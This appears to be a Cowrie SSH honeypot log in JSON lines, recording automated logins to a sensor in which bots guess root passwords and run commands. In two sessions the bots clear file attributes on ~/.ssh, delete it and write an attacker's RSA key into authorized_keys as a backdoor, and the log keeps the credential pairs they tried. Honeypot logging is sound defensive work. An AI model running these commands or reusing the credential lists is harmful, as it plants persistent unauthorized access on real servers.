{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:44:58.611511Z","src_ip":"182.18.161.165","session":"ff53556c8987"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:44:58.868747Z","src_ip":"182.18.161.165","session":"ff53556c8987"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:44:59.938622Z","src_ip":"182.18.161.165","session":"ff53556c8987"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:00.190106Z","src_ip":"182.18.161.165","session":"3a3bf05411e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:00.196755Z","src_ip":"182.18.161.165","session":"ff53556c8987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51176,"dst_ip":"1.2.3.4","dst_port":22,"session":"146175b3183d","protocol":"ssh","message":"New connection: 212.227.235.229:51176 (1.2.3.4:22) [session: 146175b3183d]","sensor":"my-vps","timestamp":"2025-09-08T23:45:07.964643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:07.965273Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:08.279349Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.login.success","username":"root","password":"pan5202414","message":"login attempt [root/pan5202414] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:45:09.568508Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:45:10.212501Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:45:10.213226Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:45:10.214286Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:10.526477Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:45:11.254624Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:45:11.255376Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:45:11.569467Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:11.570386Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51178,"dst_ip":"1.2.3.4","dst_port":22,"session":"be9f483e2e52","protocol":"ssh","message":"New connection: 212.227.235.229:51178 (1.2.3.4:22) [session: be9f483e2e52]","sensor":"my-vps","timestamp":"2025-09-08T23:45:11.870751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:11.871368Z","src_ip":"212.227.235.229","session":"be9f483e2e52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:12.629328Z","src_ip":"212.227.235.229","session":"be9f483e2e52"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":59062,"dst_ip":"1.2.3.4","dst_port":22,"session":"d46ef0620188","protocol":"ssh","message":"New connection: 45.150.34.92:59062 (1.2.3.4:22) [session: d46ef0620188]","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.329861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.330762Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.348063Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.login.success","username":"root","password":"bullet","message":"login attempt [root/bullet] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.459705Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:45:13.512702Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.513360Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.514462Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.532712Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:45:13.678818Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.679525Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.698616Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.699469Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":59076,"dst_ip":"1.2.3.4","dst_port":22,"session":"97c8b406ac09","protocol":"ssh","message":"New connection: 45.150.34.92:59076 (1.2.3.4:22) [session: 97c8b406ac09]","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.715362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.715857Z","src_ip":"45.150.34.92","session":"97c8b406ac09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.733373Z","src_ip":"45.150.34.92","session":"97c8b406ac09"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.843764Z","src_ip":"45.150.34.92","session":"97c8b406ac09"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:45:13.873734Z","src_ip":"212.227.235.229","session":"be9f483e2e52"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:14.863760Z","src_ip":"45.150.34.92","session":"97c8b406ac09"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":59084,"dst_ip":"1.2.3.4","dst_port":22,"session":"8037aa680a03","protocol":"ssh","message":"New connection: 45.150.34.92:59084 (1.2.3.4:22) [session: 8037aa680a03]","sensor":"my-vps","timestamp":"2025-09-08T23:45:14.880449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:14.881345Z","src_ip":"45.150.34.92","session":"8037aa680a03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:14.898870Z","src_ip":"45.150.34.92","session":"8037aa680a03"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.012721Z","src_ip":"45.150.34.92","session":"8037aa680a03"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.031909Z","src_ip":"45.150.34.92","session":"d46ef0620188"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.032794Z","src_ip":"45.150.34.92","session":"8037aa680a03"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.175569Z","src_ip":"212.227.235.229","session":"be9f483e2e52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50870,"dst_ip":"1.2.3.4","dst_port":22,"session":"46378fb6ab7d","protocol":"ssh","message":"New connection: 212.227.235.229:50870 (1.2.3.4:22) [session: 46378fb6ab7d]","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.509624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.510438Z","src_ip":"212.227.235.229","session":"46378fb6ab7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:45:15.835732Z","src_ip":"212.227.235.229","session":"46378fb6ab7d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:45:17.343279Z","src_ip":"212.227.235.229","session":"46378fb6ab7d"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:17.741969Z","src_ip":"212.227.235.229","session":"146175b3183d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:17.748763Z","src_ip":"212.227.235.229","session":"46378fb6ab7d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49600,"dst_ip":"1.2.3.4","dst_port":22,"session":"19bc3bfb4de0","protocol":"ssh","message":"New connection: 217.72.205.35:49600 (1.2.3.4:22) [session: 19bc3bfb4de0]","sensor":"my-vps","timestamp":"2025-09-08T23:45:18.509859Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:45:18.510994Z","src_ip":"217.72.205.35","session":"19bc3bfb4de0"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":38300,"dst_ip":"1.2.3.4","dst_port":22,"session":"92221ca3a40e","protocol":"ssh","message":"New connection: 46.101.8.63:38300 (1.2.3.4:22) [session: 92221ca3a40e]","sensor":"my-vps","timestamp":"2025-09-08T23:45:55.914621Z"}
